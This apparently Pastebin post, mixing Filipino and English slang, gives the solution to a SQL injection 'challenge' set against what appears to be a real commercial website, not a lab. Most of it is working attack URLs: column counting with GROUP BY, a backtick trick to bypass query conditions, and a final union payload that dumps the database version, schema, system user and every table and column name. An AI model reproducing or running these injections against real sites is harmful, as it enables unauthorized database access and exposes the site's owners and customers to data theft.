Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SA - EZ SQLi Challenge {SOLUTION}
- CHALLENGE:
- Site: http://comforthomesolution.com/product.php?c=11
- Level: ez as fuck (totoo na to HAHAHAHA but medj tricky hihi)
- Tasks:
- -Union based only (don't use other fucking methods)
- -Print your name, version, db, user, tables and columns
- Rules: (wala na muna masyado hihi )
- -Thou shall not use version(), @@version in printing the version
- -Thou shall not use user(), @@user, current_user in printing the user
- -Thou shall not use database() in printing the database
- -PM me your query to be in the solvers list
- SOLUTION:
- First of all kelangan muna natin iclose yung query gamit ang ")" para hindi maka-apekto sa ating query.
- We can easily get the number of columns using the group_by function :)
- http://comforthomesolution.com/product.php?c=11)+group+by+1--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+2--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+3--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+4--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+5--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+6--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+7--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+8--+ <- no error
- http://comforthomesolution.com/product.php?c=11)+group+by+9--+ < fuck bro atlast error!!!
- Okay, so ngayon alam na natin na may 8 columns lang. So let's try it boiz!
- http://comforthomesolution.com/product.php?c=.11)+union+select+1,2,3,4,5,6,7,8--+
- Wtf anyare bat ganon? Hindi lumabas fuck this shit :( ((mostly ayan yung naencounter niyong error right? Dahil yan sa sql statements na naka-loob sa ating iniinject na site. (column condition shits)
- To bypass it at para iignore yung c_cat.id etc ay gagamitin natin ang banal na backtick "`" or pag nakaurl-encode siya "%60"
- Now let's try it!
- http://comforthomesolution.com/product.php?c=.11)+union+select+1,2,3,4,5,6,7,8`--+
- Ehmerged lumabas na yung vuln columns woo!!! Pwede na natin idios ang site so this will be the final query.
- http://comforthomesolution.com/product.php?c=11) union select 1,concat(@@global.version,0x3a3a53696c656e74416e67656c3c62723e44617461626173653a3a,schema(),0x3c62723e557365723a3a,system_user(),concat(@c:=0x00,if((select+count(*)+from+information_schema.columns+where+table_schema=database()+AND+@c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c)),3,4,5,6,7,8`
- Hope you learned something :))
- Btw, I'm planning to create a youtube channel too in the near future so stay tuned folks!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement